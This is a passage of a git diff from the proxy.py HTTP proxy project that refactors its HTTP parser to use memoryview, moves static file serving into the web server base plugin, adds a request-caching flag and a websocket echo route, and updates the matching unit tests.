for_proxy: bool = False) -> bytes: """Rebuild the request object.""" @@ -263,6 +270,7 @@ def build(self, disable_headers: Optional[List[bytes]] = None, for_proxy: bool = k.lower() not in disable_headers }, body=body, + no_ua=True, ) def build_response(self) -> bytes: @@ -278,7 +286,7 @@ def build_response(self) -> bytes: body=self._get_body_or_chunks(), ) - def _process_body(self, raw: bytes) -> Tuple[bool, bytes]: + def _process_body(self, raw: memoryview) -> Tuple[bool, memoryview]: # Ref: http://www.ietf.org/rfc/rfc2616.txt # 3.If a Content-Length header field (section 14.13) is present, its # decimal value in OCTETs represents both the entity-length and the @@ -297,7 +305,8 @@ def _process_body(self, raw: bytes) -> Tuple[bool, bytes]: self.body = self.chunk.body self.state = httpParserStates.COMPLETE more = False - elif self._content_expected: + return more, raw + if self._content_expected: self.state = httpParserStates.RCVING_BODY if self.body is None: self.body = b'' @@ -307,23 +316,21 @@ def _process_body(self, raw: bytes) -> Tuple[bool, bytes]: if self.body and \ len(self.body) == int(self.header(b'content-length')): self.state = httpParserStates.COMPLETE - more, raw = len(raw) > 0, raw[total_size - received_size:] - else: - self.state = httpParserStates.RCVING_BODY - # Received a packet without content-length header - # and no transfer-encoding specified. - # - # This can happen for both HTTP/1.0 and HTTP/1.1 scenarios. 
- # Currently, we consume the remaining buffer as body. - # - # Ref https://github.com/abhinavsingh/proxy.py/issues/398 - # - # See TestHttpParser.test_issue_398 scenario - self.body = raw - more, raw = False, b'' - return more, raw - - def _process_headers(self, raw: bytes) -> Tuple[bool, bytes]: + return len(raw) > 0, raw[total_size - received_size:] + # Received a packet without content-length header + # and no transfer-encoding specified. + # + # This can happen for both HTTP/1.0 and HTTP/1.1 scenarios. + # Currently, we consume the remaining buffer as body. + # + # Ref https://github.com/abhinavsingh/proxy.py/issues/398 + # + # See TestHttpParser.test_issue_398 scenario + self.state = httpParserStates.RCVING_BODY + self.body = raw + return False, memoryview(b'') + + def _process_headers(self, raw: memoryview) -> Tuple[bool, memoryview]: """Returns False when no CRLF could be found in received bytes. TODO: We should not return until parser reaches headers complete @@ -334,10 +341,10 @@ def _process_headers(self, raw: bytes) -> Tuple[bool, bytes]: This will also help make the parser even more stateless. """ while True: - parts = raw.split(CRLF, 1) + parts = raw.tobytes().split(CRLF, 1) if len(parts) == 1: return False, raw - line, raw = parts[0], parts[1] + line, raw = parts[0], memoryview(parts[1]) if self.state in (httpParserStates.LINE_RCVD, httpParserStates.RCVING_HEADERS): if line == b'' or line.strip() == b'': # Blank line received. self.state = httpParserStates.HEADERS_COMPLETE @@ -352,14 +359,14 @@ def _process_headers(self, raw: bytes) -> Tuple[bool, bytes]: def _process_line( self, - raw: bytes, + raw: memoryview, allowed_url_schemes: Optional[List[bytes]] = None, - ) -> Tuple[bool, bytes]: + ) -> Tuple[bool, memoryview]: while True: - parts = raw.split(CRLF, 1) + parts = raw.tobytes().split(CRLF, 1) if len(parts) == 1: return False, raw - line, raw = parts[0], parts[1] + line, raw = parts[0], memoryview(parts[1]) if self.type == httpParserTypes.REQUEST_PARSER: if self.protocol is not None and self.protocol.version is None: # We expect to receive entire proxy protocol v1 line diff --git a/proxy/http/plugin.py b/proxy/http/plugin.py index ff37173773..754fb28024 100644 --- a/proxy/http/plugin.py +++ b/proxy/http/plugin.py @@ -71,9 +71,9 @@ def protocols() -> List[int]: raise NotImplementedError() @abstractmethod - def on_client_data(self, raw: memoryview) -> Optional[memoryview]: + def on_client_data(self, raw: memoryview) -> None: """Called only after original request has been completely received.""" - return raw # pragma: no cover + pass # pragma: no cover @abstractmethod def on_request_complete(self) -> Union[socket.socket, bool]: diff --git a/proxy/http/proxy/plugin.py b/proxy/http/proxy/plugin.py index a71e553b33..7768e3c59d 100644 --- a/proxy/http/proxy/plugin.py +++ b/proxy/http/proxy/plugin.py @@ -121,7 +121,6 @@ def handle_client_request( Return None to drop the request data, e.g. in case a response has already been queued. Raise HttpRequestRejected or HttpProtocolException directly to tear down the connection with client. 
- """ return request # pragma: no cover diff --git a/proxy/http/proxy/server.py b/proxy/http/proxy/server.py index 10932fde9e..019eb651e7 100644 --- a/proxy/http/proxy/server.py +++ b/proxy/http/proxy/server.py @@ -188,7 +188,7 @@ async def write_to_descriptors(self, w: Writables) -> bool: self.upstream.connection.fileno() in w: logger.debug('Server is write ready, flushing...') try: - self.upstream.flush() + self.upstream.flush(self.flags.max_sendbuf_size) except ssl.SSLWantWriteError: logger.warning( 'SSLWantWriteError while trying to flush to server, will retry', @@ -276,11 +276,8 @@ async def read_from_descriptors(self, r: Readables) -> bool: if self.response.is_complete: self.handle_pipeline_response(raw) else: - # TODO(abhinavsingh): Remove .tobytes after parser is - # memoryview compliant - chunk = raw.tobytes() - self.response.parse(chunk) - self.emit_response_events(len(chunk)) + self.response.parse(raw) + self.emit_response_events(len(raw)) else: self.response.total_size += len(raw) # queue raw data for client @@ -398,7 +395,7 @@ def on_response_chunk(self, chunk: List[memoryview]) -> List[memoryview]: return chunk # Can return None to tear down connection - def on_client_data(self, raw: memoryview) -> Optional[memoryview]: + def on_client_data(self, raw: memoryview) -> None: # For scenarios when an upstream connection was never established, # let plugin do whatever they wish to. These are special scenarios # where plugins are trying to do something magical. Within the core @@ -413,7 +410,7 @@ def on_client_data(self, raw: memoryview) -> Optional[memoryview]: for plugin in self.plugins.values(): o = plugin.handle_client_data(raw) if o is None: - return None + return raw = o elif self.upstream and not self.upstream.closed: # For http proxy requests, handle pipeline case. @@ -429,25 +426,26 @@ def on_client_data(self, raw: memoryview) -> Optional[memoryview]: # upgrade request. Incoming client data now # must be treated as WebSocket protocol packets. self.upstream.queue(raw) - return None - + return if self.pipeline_request is None: # For pipeline requests, we never # want to use --enable-proxy-protocol flag # as proxy protocol header will not be present + # + # TODO: HTTP parser must be smart about detecting + # HA proxy protocol or we must always explicitly pass + # the flag when we are expecting HA proxy protocol + # request line before HTTP request lines. self.pipeline_request = HttpParser( httpParserTypes.REQUEST_PARSER, ) - - # TODO(abhinavsingh): Remove .tobytes after parser is - # memoryview compliant - self.pipeline_request.parse(raw.tobytes()) + self.pipeline_request.parse(raw) if self.pipeline_request.is_complete: for plugin in self.plugins.values(): assert self.pipeline_request is not None r = plugin.handle_client_request(self.pipeline_request) if r is None: - return None + return self.pipeline_request = r assert self.pipeline_request is not None # TODO(abhinavsingh): Remove memoryview wrapping here after @@ -463,8 +461,6 @@ def on_client_data(self, raw: memoryview) -> Optional[memoryview]: # simply queue for upstream server. 
else: self.upstream.queue(raw) - return None - return raw def on_request_complete(self) -> Union[socket.socket, bool]: self.emit_request_complete() @@ -552,9 +548,7 @@ def handle_pipeline_response(self, raw: memoryview) -> None: self.pipeline_response = HttpParser( httpParserTypes.RESPONSE_PARSER, ) - # TODO(abhinavsingh): Remove .tobytes after parser is memoryview - # compliant - self.pipeline_response.parse(raw.tobytes()) + self.pipeline_response.parse(raw) if self.pipeline_response.is_complete: self.pipeline_response = None @@ -759,7 +753,11 @@ def wrap_server(self) -> bool: assert isinstance(self.upstream.connection, socket.socket) do_close = False try: - self.upstream.wrap(text_(self.request.host), self.flags.ca_file) + self.upstream.wrap( + text_(self.request.host), + self.flags.ca_file, + as_non_blocking=True, + ) except ssl.SSLCertVerificationError: # Server raised certificate verification error # When --disable-interception-on-ssl-cert-verification-error flag is on, # we will cache such upstream hosts and avoid intercepting them for future diff --git a/proxy/http/responses.py b/proxy/http/responses.py index c1e8a17395..8a7ed5be7d 100644 --- a/proxy/http/responses.py +++ b/proxy/http/responses.py @@ -12,9 +12,11 @@ from typing import Any, Dict, Optional from .codes import httpStatusCodes -from ..common.flag import flags from ..common.utils import build_http_response -from ..common.constants import PROXY_AGENT_HEADER_KEY, PROXY_AGENT_HEADER_VALUE +from ..common.constants import ( + PROXY_AGENT_HEADER_KEY, PROXY_AGENT_HEADER_VALUE, + DEFAULT_MIN_COMPRESSION_LENGTH, +) PROXY_TUNNEL_ESTABLISHED_RESPONSE_PKT = memoryview( @@ -98,10 +100,11 @@ def okResponse( content: Optional[bytes] = None, headers: Optional[Dict[bytes, bytes]] = None, compress: bool = True, + min_compression_length: int = DEFAULT_MIN_COMPRESSION_LENGTH, **kwargs: Any, ) -> memoryview: do_compress: bool = False - if flags.args and compress and content and len(content) > flags.args.min_compression_limit: + if compress and content and len(content) > min_compression_length: do_compress = True if not headers: headers = {} diff --git a/proxy/http/server/plugin.py b/proxy/http/server/plugin.py index 7870620033..0115558c18 100644 --- a/proxy/http/server/plugin.py +++ b/proxy/http/server/plugin.py @@ -9,14 +9,17 @@ :license: BSD, see LICENSE for more details. """ import argparse +import mimetypes from abc import ABC, abstractmethod from typing import TYPE_CHECKING, Any, Dict, List, Tuple, Optional from ..parser import HttpParser +from ..responses import NOT_FOUND_RESPONSE_PKT, okResponse from ..websocket import WebsocketFrame from ..connection import HttpClientConnection from ...core.event import EventQueue from ..descriptors import DescriptorsHandlerMixin +from ...common.utils import bytes_ if TYPE_CHECKING: # pragma: no cover @@ -40,6 +43,28 @@ def __init__( self.event_queue = event_queue self.upstream_conn_pool = upstream_conn_pool + @staticmethod + def serve_static_file(path: str, min_compression_length: int) -> memoryview: + try: + with open(path, 'rb') as f: + content = f.read() + content_type = mimetypes.guess_type(path)[0] + if content_type is None: + content_type = 'text/plain' + headers = { + b'Content-Type': bytes_(content_type), + b'Cache-Control': b'max-age=86400', + } + return okResponse( + content=content, + headers=headers, + min_compression_length=min_compression_length, + # TODO: Should we really close or take advantage of keep-alive? 
+ conn_close=True, + ) + except FileNotFoundError: + return NOT_FOUND_RESPONSE_PKT + def name(self) -> str: """A unique name for your plugin. diff --git a/proxy/http/server/reverse.py b/proxy/http/server/reverse.py index 11d5150328..45afe1f91f 100644 --- a/proxy/http/server/reverse.py +++ b/proxy/http/server/reverse.py @@ -83,6 +83,7 @@ def handle_request(self, request: HttpParser) -> None: text_( self.choice.hostname, ), + as_non_blocking=True, ) # Update Host header # if request.has_header(b'Host'): diff --git a/proxy/http/server/web.py b/proxy/http/server/web.py index f6b0a12fc3..06072493b2 100644 --- a/proxy/http/server/web.py +++ b/proxy/http/server/web.py @@ -12,7 +12,6 @@ import time import socket import logging -import mimetypes from typing import Any, Dict, List, Tuple, Union, Pattern, Optional from .plugin import HttpWebServerBasePlugin @@ -21,15 +20,15 @@ from .protocols import httpProtocolTypes from ..exception import HttpProtocolException from ..protocols import httpProtocols -from ..responses import NOT_FOUND_RESPONSE_PKT, okResponse +from ..responses import NOT_FOUND_RESPONSE_PKT from ..websocket import WebsocketFrame, websocketOpcodes from ...common.flag import flags from ...common.types import Readables, Writables, Descriptors -from ...common.utils import text_, bytes_, build_websocket_handshake_response +from ...common.utils import text_, build_websocket_handshake_response from ...common.constants import ( DEFAULT_ENABLE_WEB_SERVER, DEFAULT_STATIC_SERVER_DIR, DEFAULT_ENABLE_REVERSE_PROXY, DEFAULT_ENABLE_STATIC_SERVER, - DEFAULT_MIN_COMPRESSION_LIMIT, DEFAULT_WEB_ACCESS_LOG_FORMAT, + DEFAULT_WEB_ACCESS_LOG_FORMAT, DEFAULT_MIN_COMPRESSION_LENGTH, ) @@ -65,8 +64,8 @@ flags.add_argument( '--min-compression-length', type=int, - default=DEFAULT_MIN_COMPRESSION_LIMIT, - help='Default: ' + str(DEFAULT_MIN_COMPRESSION_LIMIT) + ' bytes. ' + + default=DEFAULT_MIN_COMPRESSION_LENGTH, + help='Default: ' + str(DEFAULT_MIN_COMPRESSION_LENGTH) + ' bytes. ' + 'Sets the minimum length of a response that will be compressed (gzipped).', ) @@ -124,27 +123,6 @@ def encryption_enabled(self) -> bool: return self.flags.keyfile is not None and \ self.flags.certfile is not None - @staticmethod - def read_and_build_static_file_response(path: str) -> memoryview: - try: - with open(path, 'rb') as f: - content = f.read() - content_type = mimetypes.guess_type(path)[0] - if content_type is None: - content_type = 'text/plain' - headers = { - b'Content-Type': bytes_(content_type), - b'Cache-Control': b'max-age=86400', - } - return okResponse( - content=content, - headers=headers, - # TODO: Should we really close or take advantage of keep-alive? - conn_close=True, - ) - except FileNotFoundError: - return NOT_FOUND_RESPONSE_PKT - def switch_to_websocket(self) -> None: self.client.queue( memoryview( @@ -194,10 +172,12 @@ async def read_from_descriptors(self, r: Readables) -> bool: return True return False - def on_client_data(self, raw: memoryview) -> Optional[memoryview]: + def on_client_data(self, raw: memoryview) -> None: if self.switched_protocol == httpProtocolTypes.WEBSOCKET: - # TODO(abhinavsingh): Remove .tobytes after websocket frame parser - # is memoryview compliant + # TODO(abhinavsingh): Do we really tobytes() here? + # Websocket parser currently doesn't depend on internal + # buffers, due to which it can directly parse out of + # memory views. But how about large payloads scenarios? 
remaining = raw.tobytes() frame = WebsocketFrame() while remaining != b'': @@ -211,7 +191,7 @@ def on_client_data(self, raw: memoryview) -> Optional[memoryview]: assert self.route self.route.on_websocket_message(frame) frame.reset() - return None + return # If 1st valid request was completed and it's a HTTP/1.1 keep-alive # And only if we have a route, parse pipeline requests if self.request.is_complete and \ @@ -221,9 +201,7 @@ def on_client_data(self, raw: memoryview) -> Optional[memoryview]: self.pipeline_request = HttpParser( httpParserTypes.REQUEST_PARSER, ) - # TODO(abhinavsingh): Remove .tobytes after parser is memoryview - # compliant - self.pipeline_request.parse(raw.tobytes()) + self.pipeline_request.parse(raw) if self.pipeline_request.is_complete: self.route.handle_request(self.pipeline_request) if not self.pipeline_request.is_http_1_1_keep_alive: @@ -231,7 +209,6 @@ def on_client_data(self, raw: memoryview) -> Optional[memoryview]: 'Pipelined request is not keep-alive, will tear down request...', ) self.pipeline_request = None - return raw def on_response_chunk(self, chunk: List[memoryview]) -> List[memoryview]: return chunk @@ -310,7 +287,8 @@ def _try_route(self, path: bytes) -> bool: def _try_static_or_404(self, path: bytes) -> None: path = text_(path).split('?', 1)[0] self.client.queue( - self.read_and_build_static_file_response( + HttpWebServerBasePlugin.serve_static_file( self.flags.static_server_dir + path, + self.flags.min_compression_length, ), ) diff --git a/proxy/http/websocket/client.py b/proxy/http/websocket/client.py index c8c53ebee8..2f61cbab89 100644 --- a/proxy/http/websocket/client.py +++ b/proxy/http/websocket/client.py @@ -27,6 +27,9 @@ class WebsocketClient(TcpConnection): + """Websocket client connection. + + TODO: Make me compatible with the work framework.""" def __init__( self, @@ -57,10 +60,14 @@ def connection(self) -> TcpOrTlsSocket: return self.sock def handshake(self) -> None: + """Start websocket upgrade & handshake protocol""" self.upgrade() self.sock.setblocking(False) def upgrade(self) -> None: + """Creates a key and sends websocket handshake packet to upstream. 
+ Receives response from the server and asserts that websocket + accept header is valid in the response.""" key = base64.b64encode(secrets.token_bytes(16)) self.sock.send( build_websocket_handshake_request( @@ -70,16 +77,10 @@ def upgrade(self) -> None: ), ) response = HttpParser(httpParserTypes.RESPONSE_PARSER) - response.parse(self.sock.recv(DEFAULT_BUFFER_SIZE)) + response.parse(memoryview(self.sock.recv(DEFAULT_BUFFER_SIZE))) accept = response.header(b'Sec-Websocket-Accept') assert WebsocketFrame.key_to_accept(key) == accept - def ping(self, data: Optional[bytes] = None) -> None: - pass # pragma: no cover - - def pong(self, data: Optional[bytes] = None) -> None: - pass # pragma: no cover - def shutdown(self, _data: Optional[bytes] = None) -> None: """Closes connection with the server.""" super().close() @@ -93,16 +94,16 @@ def run_once(self) -> bool: self.selector.unregister(self.sock) for _, mask in events: if mask & selectors.EVENT_READ and self.on_message: + # TODO: client recvbuf size flag currently not used here raw = self.recv() - if raw is None or raw.tobytes() == b'': + if raw is None or raw == b'': self.closed = True return True frame = WebsocketFrame() - # TODO(abhinavsingh): Remove .tobytes after parser is - # memoryview compliant frame.parse(raw.tobytes()) self.on_message(frame) elif mask & selectors.EVENT_WRITE: + # TODO: max sendbuf size flag currently not used here self.flush() return False @@ -121,3 +122,4 @@ def run(self) -> None: except OSError: pass self.sock.close() + self.selector.close() diff --git a/proxy/plugin/__init__.py b/proxy/plugin/__init__.py index e76a253468..f75dcbbfc1 100644 --- a/proxy/plugin/__init__.py +++ b/proxy/plugin/__init__.py @@ -11,6 +11,8 @@ .. spelling:: Cloudflare + ws + onmessage """ from .cache import CacheResponsesPlugin, BaseCacheResponsesPlugin from .shortlink import ShortLinkPlugin diff --git a/proxy/plugin/cache/cache_responses.py b/proxy/plugin/cache/cache_responses.py index cbc57ebc16..45bd3174de 100644 --- a/proxy/plugin/cache/cache_responses.py +++ b/proxy/plugin/cache/cache_responses.py @@ -30,6 +30,7 @@ def __init__(self, *args: Any, **kwargs: Any) -> None: self.flags.cache_dir, 'responses', ), + cache_requests=self.flags.cache_requests, ) self.set_store(self.disk_store) diff --git a/proxy/plugin/cache/store/disk.py b/proxy/plugin/cache/store/disk.py index a9ac027ba4..da849b07d9 100644 --- a/proxy/plugin/cache/store/disk.py +++ b/proxy/plugin/cache/store/disk.py @@ -16,7 +16,9 @@ from ....common.flag import flags from ....http.parser import HttpParser from ....common.utils import text_ -from ....common.constants import DEFAULT_CACHE_DIRECTORY_PATH +from ....common.constants import ( + DEFAULT_CACHE_REQUESTS, DEFAULT_CACHE_DIRECTORY_PATH, +) logger = logging.getLogger(__name__) @@ -30,12 +32,21 @@ 'Flag only applicable when cache plugin is used with on-disk storage.', ) +flags.add_argument( + '--cache-requests', + action='store_true', + default=DEFAULT_CACHE_REQUESTS, + help='Default: False. 
' + + 'Whether to also cache request packets.', +) + class OnDiskCacheStore(CacheStore): - def __init__(self, uid: str, cache_dir: str) -> None: + def __init__(self, uid: str, cache_dir: str, cache_requests: bool) -> None: super().__init__(uid) self.cache_dir = cache_dir + self.cache_requests = cache_requests self.cache_file_path: Optional[str] = None self.cache_file: Optional[BinaryIO] = None @@ -47,6 +58,8 @@ def open(self, request: HttpParser) -> None: self.cache_file = open(self.cache_file_path, "wb") def cache_request(self, request: HttpParser) -> Optional[HttpParser]: + if self.cache_file and self.cache_requests: + self.cache_file.write(request.build()) return request def cache_response_chunk(self, chunk: memoryview) -> memoryview: diff --git a/proxy/plugin/modify_chunk_response.py b/proxy/plugin/modify_chunk_response.py index 16171e1f11..f050121fc0 100644 --- a/proxy/plugin/modify_chunk_response.py +++ b/proxy/plugin/modify_chunk_response.py @@ -32,7 +32,7 @@ def __init__(self, *args: Any, **kwargs: Any) -> None: def handle_upstream_chunk(self, chunk: memoryview) -> Optional[memoryview]: # Parse the response. # Note that these chunks also include headers - self.response.parse(chunk.tobytes()) + self.response.parse(chunk) # If response is complete, modify and dispatch to client if self.response.is_complete: # Avoid setting a body for responses where a body is not expected. diff --git a/proxy/plugin/modify_post_data.py b/proxy/plugin/modify_post_data.py index d4b5ba6174..a290ed59f0 100644 --- a/proxy/plugin/modify_post_data.py +++ b/proxy/plugin/modify_post_data.py @@ -12,7 +12,7 @@ from ..http import httpMethods from ..http.proxy import HttpProxyBasePlugin -from ..http.parser import HttpParser +from ..http.parser import HttpParser, ChunkParser from ..common.utils import bytes_ @@ -30,14 +30,20 @@ def handle_client_request( self, request: HttpParser, ) -> Optional[HttpParser]: if request.method == httpMethods.POST: - request.body = ModifyPostDataPlugin.MODIFIED_BODY - # Update Content-Length header only when request is NOT chunked - # encoded - if not request.is_chunked_encoded: + # If request data is compressed, compress the body too + body = ModifyPostDataPlugin.MODIFIED_BODY + # If the request is of type chunked encoding + # add post data as chunk + if request.is_chunked_encoded: + body = ChunkParser.to_chunks( + ModifyPostDataPlugin.MODIFIED_BODY, + ) + else: request.add_header( b'Content-Length', - bytes_(len(request.body)), + bytes_(len(body)), ) + request.body = body # Enforce content-type json if request.has_header(b'Content-Type'): request.del_header(b'Content-Type') diff --git a/proxy/plugin/web_server_route.py b/proxy/plugin/web_server_route.py index 205a8f9bf2..3b927cd55d 100644 --- a/proxy/plugin/web_server_route.py +++ b/proxy/plugin/web_server_route.py @@ -7,6 +7,11 @@ :copyright: (c) 2013-present by Abhinav Singh and contributors. :license: BSD, see LICENSE for more details. + + .. 
spelling:: + + ws + onmessage """ import logging from typing import List, Tuple @@ -14,6 +19,7 @@ from ..http.parser import HttpParser from ..http.server import HttpWebServerBasePlugin, httpProtocolTypes from ..http.responses import okResponse +from ..http.websocket.frame import WebsocketFrame logger = logging.getLogger(__name__) @@ -37,3 +43,15 @@ def handle_request(self, request: HttpParser) -> None: self.client.queue(HTTP_RESPONSE) elif request.path == b'/https-route-example': self.client.queue(HTTPS_RESPONSE) + + def on_websocket_message(self, frame: WebsocketFrame) -> None: + """Open chrome devtools and try using following commands: + + Example: + + ws = new WebSocket("ws://localhost:8899/ws-route-example") + ws.onmessage = function(m) { console.log(m); } + ws.send('hello') + + """ + self.client.queue(memoryview(WebsocketFrame.text(frame.data or b''))) diff --git a/tests/http/exceptions/test_http_request_rejected.py b/tests/http/exceptions/test_http_request_rejected.py index 9a6652d6b8..f50cee770d 100644 --- a/tests/http/exceptions/test_http_request_rejected.py +++ b/tests/http/exceptions/test_http_request_rejected.py @@ -31,6 +31,7 @@ def test_status_code_response(self) -> None: self.assertEqual( e.response(self.request), CRLF.join([ b'HTTP/1.1 200 OK', + b'Content-Length: 0', b'Connection: close', CRLF, ]), diff --git a/tests/http/parser/test_chunk_parser.py b/tests/http/parser/test_chunk_parser.py index 1fde17256a..5df67264f1 100644 --- a/tests/http/parser/test_chunk_parser.py +++ b/tests/http/parser/test_chunk_parser.py @@ -20,16 +20,18 @@ def setUp(self) -> None: def test_chunk_parse_basic(self) -> None: self.parser.parse( - b''.join([ - b'4\r\n', - b'Wiki\r\n', - b'5\r\n', - b'pedia\r\n', - b'E\r\n', - b' in\r\n\r\nchunks.\r\n', - b'0\r\n', - b'\r\n', - ]), + memoryview( + b''.join([ + b'4\r\n', + b'Wiki\r\n', + b'5\r\n', + b'pedia\r\n', + b'E\r\n', + b' in\r\n\r\nchunks.\r\n', + b'0\r\n', + b'\r\n', + ]), + ), ) self.assertEqual(self.parser.chunk, b'') self.assertEqual(self.parser.size, None) @@ -38,7 +40,7 @@ def test_chunk_parse_basic(self) -> None: def test_chunk_parse_issue_27(self) -> None: """Case when data ends with the chunk size but without ending CRLF.""" - self.parser.parse(b'3') + self.parser.parse(memoryview(b'3')) self.assertEqual(self.parser.chunk, b'3') self.assertEqual(self.parser.size, None) self.assertEqual(self.parser.body, b'') @@ -46,7 +48,7 @@ def test_chunk_parse_issue_27(self) -> None: self.parser.state, chunkParserStates.WAITING_FOR_SIZE, ) - self.parser.parse(b'\r\n') + self.parser.parse(memoryview(b'\r\n')) self.assertEqual(self.parser.chunk, b'') self.assertEqual(self.parser.size, 3) self.assertEqual(self.parser.body, b'') @@ -54,7 +56,7 @@ def test_chunk_parse_issue_27(self) -> None: self.parser.state, chunkParserStates.WAITING_FOR_DATA, ) - self.parser.parse(b'abc') + self.parser.parse(memoryview(b'abc')) self.assertEqual(self.parser.chunk, b'') self.assertEqual(self.parser.size, None) self.assertEqual(self.parser.body, b'abc') @@ -62,7 +64,7 @@ def test_chunk_parse_issue_27(self) -> None: self.parser.state, chunkParserStates.WAITING_FOR_SIZE, ) - self.parser.parse(b'\r\n') + self.parser.parse(memoryview(b'\r\n')) self.assertEqual(self.parser.chunk, b'') self.assertEqual(self.parser.size, None) self.assertEqual(self.parser.body, b'abc') @@ -70,7 +72,7 @@ def test_chunk_parse_issue_27(self) -> None: self.parser.state, chunkParserStates.WAITING_FOR_SIZE, ) - self.parser.parse(b'4\r\n') + self.parser.parse(memoryview(b'4\r\n')) 
self.assertEqual(self.parser.chunk, b'') self.assertEqual(self.parser.size, 4) self.assertEqual(self.parser.body, b'abc') @@ -78,7 +80,7 @@ def test_chunk_parse_issue_27(self) -> None: self.parser.state, chunkParserStates.WAITING_FOR_DATA, ) - self.parser.parse(b'defg\r\n0') + self.parser.parse(memoryview(b'defg\r\n0')) self.assertEqual(self.parser.chunk, b'0') self.assertEqual(self.parser.size, None) self.assertEqual(self.parser.body, b'abcdefg') @@ -86,7 +88,7 @@ def test_chunk_parse_issue_27(self) -> None: self.parser.state, chunkParserStates.WAITING_FOR_SIZE, ) - self.parser.parse(b'\r\n\r\n') + self.parser.parse(memoryview(b'\r\n\r\n')) self.assertEqual(self.parser.chunk, b'') self.assertEqual(self.parser.size, None) self.assertEqual(self.parser.body, b'abcdefg') diff --git a/tests/http/parser/test_http_parser.py b/tests/http/parser/test_http_parser.py index 68510415ea..427553c310 100644 --- a/tests/http/parser/test_http_parser.py +++ b/tests/http/parser/test_http_parser.py @@ -28,37 +28,39 @@ def setUp(self) -> None: def test_issue_127(self) -> None: with self.assertRaises(HttpProtocolException): - self.parser.parse(CRLF) + self.parser.parse(memoryview(CRLF)) with self.assertRaises(HttpProtocolException): raw = b'qwqrqw!@!#@!#ad adfad\r\n' while True: - self.parser.parse(raw) + self.parser.parse(memoryview(raw)) def test_issue_398(self) -> None: p = HttpParser(httpParserTypes.RESPONSE_PARSER) - p.parse(HTTP_1_0 + b' 200 OK' + CRLF) + p.parse(memoryview(HTTP_1_0 + b' 200 OK' + CRLF)) self.assertEqual(p.version, HTTP_1_0) self.assertEqual(p.code, b'200') self.assertEqual(p.reason, b'OK') self.assertEqual(p.state, httpParserStates.LINE_RCVD) p.parse( - b'CP=CAO PSA OUR' + CRLF + - b'Cache-Control:private,max-age=0;' + CRLF + - b'X-Frame-Options:SAMEORIGIN' + CRLF + - b'X-Content-Type-Options:nosniff' + CRLF + - b'X-XSS-Protection:1; mode=block' + CRLF + - b'Content-Security-Policy:default-src \'self\' \'unsafe-inline\' \'unsafe-eval\'' + CRLF + - b'Strict-Transport-Security:max-age=2592000; includeSubdomains' + CRLF + - b'Set-Cookie: lang=eng; path=/;HttpOnly;' + CRLF + - b'Content-type:text/html;charset=UTF-8;' + CRLF + CRLF + - b'', + memoryview( + b'CP=CAO PSA OUR' + CRLF + + b'Cache-Control:private,max-age=0;' + CRLF + + b'X-Frame-Options:SAMEORIGIN' + CRLF + + b'X-Content-Type-Options:nosniff' + CRLF + + b'X-XSS-Protection:1; mode=block' + CRLF + + b'Content-Security-Policy:default-src \'self\' \'unsafe-inline\' \'unsafe-eval\'' + CRLF + + b'Strict-Transport-Security:max-age=2592000; includeSubdomains' + CRLF + + b'Set-Cookie: lang=eng; path=/;HttpOnly;' + CRLF + + b'Content-type:text/html;charset=UTF-8;' + CRLF + CRLF + + b'', + ), ) self.assertEqual(p.body, b'') self.assertEqual(p.state, httpParserStates.RCVING_BODY) def test_urlparse(self) -> None: - self.parser.parse(b'CONNECT httpbin.org:443 HTTP/1.1\r\n') + self.parser.parse(memoryview(b'CONNECT httpbin.org:443 HTTP/1.1\r\n')) self.assertTrue(self.parser.is_https_tunnel) self.assertFalse(self.parser.is_connection_upgrade) self.assertTrue(self.parser.is_http_1_1_keep_alive) @@ -69,40 +71,52 @@ def test_urlparse(self) -> None: self.assertNotEqual(self.parser.state, httpParserStates.COMPLETE) def test_urlparse_on_invalid_connect_request(self) -> None: - self.parser.parse(b'CONNECT / HTTP/1.0\r\n\r\n') + self.parser.parse(memoryview(b'CONNECT / HTTP/1.0\r\n\r\n')) self.assertTrue(self.parser.is_https_tunnel) self.assertEqual(self.parser.host, None) self.assertEqual(self.parser.port, 443) self.assertEqual(self.parser.state, 
httpParserStates.COMPLETE) def test_unicode_character_domain_connect(self) -> None: - self.parser.parse(bytes_('CONNECT ççç.org:443 HTTP/1.1\r\n')) + self.parser.parse( + memoryview( + bytes_('CONNECT ççç.org:443 HTTP/1.1\r\n'), + ), + ) self.assertTrue(self.parser.is_https_tunnel) self.assertEqual(self.parser.host, bytes_('ççç.org')) self.assertEqual(self.parser.port, 443) def test_invalid_ipv6_in_request_line(self) -> None: self.parser.parse( - bytes_('CONNECT 2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF:443 HTTP/1.1\r\n'), + memoryview( + bytes_('CONNECT 2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF:443 HTTP/1.1\r\n'), + ), ) self.assertTrue(self.parser.is_https_tunnel) self.assertEqual( - self.parser.host, bytes_( - '[2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF]', + self.parser.host, memoryview( + bytes_( + '[2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF]', + ), ), ) self.assertEqual(self.parser.port, 443) def test_valid_ipv6_in_request_line(self) -> None: self.parser.parse( - bytes_( - 'CONNECT [2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF]:443 HTTP/1.1\r\n', + memoryview( + bytes_( + 'CONNECT [2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF]:443 HTTP/1.1\r\n', + ), ), ) self.assertTrue(self.parser.is_https_tunnel) self.assertEqual( - self.parser.host, bytes_( - '[2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF]', + self.parser.host, memoryview( + bytes_( + '[2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF]', + ), ), ) self.assertEqual(self.parser.port, 443) @@ -110,7 +124,7 @@ def test_valid_ipv6_in_request_line(self) -> None: def test_build_request(self) -> None: self.assertEqual( build_http_request( - b'GET', b'http://localhost:12345', b'HTTP/1.1', + b'GET', b'http://localhost:12345', b'HTTP/1.1', no_ua=True, ), CRLF.join([ b'GET http://localhost:12345 HTTP/1.1', @@ -121,6 +135,7 @@ def test_build_request(self) -> None: build_http_request( b'GET', b'http://localhost:12345', b'HTTP/1.1', headers={b'key': b'value'}, + no_ua=True, ), CRLF.join([ b'GET http://localhost:12345 HTTP/1.1', @@ -133,10 +148,12 @@ def test_build_request(self) -> None: b'GET', b'http://localhost:12345', b'HTTP/1.1', headers={b'key': b'value'}, body=b'Hello from py', + no_ua=True, ), CRLF.join([ b'GET http://localhost:12345 HTTP/1.1', b'key: value', + b'Content-Length: 13', CRLF, ]) + b'Hello from py', ) @@ -146,6 +163,7 @@ def test_build_response(self) -> None: okResponse(protocol_version=b'HTTP/1.1'), 